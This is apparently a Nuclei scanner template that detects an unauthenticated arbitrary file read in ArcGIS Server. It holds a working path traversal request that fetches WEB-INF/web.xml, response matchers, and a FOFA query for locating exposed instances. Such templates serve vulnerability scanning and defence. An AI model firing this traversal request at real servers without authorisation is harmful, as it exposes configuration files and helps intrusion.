id: arcgis-fileread

info:
  name: Arcgis - File Read
  author: qwtd
  severity: high
  description: |-
    ArcGIS地理信息系统 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件。
    FOFA: title="ArcGIS"
  reference:
    - https://github.com/wy876/POC/blob/main/ArcGIS/ArcGIS%E5%9C%B0%E7%90%86%E4%BF%A1%E6%81%AF%E7%B3%BB%E7%BB%9F%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  tags: ArcGIS

http:
  - raw:
      - |
        GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "ArcGIS Server Manager"
        part: body
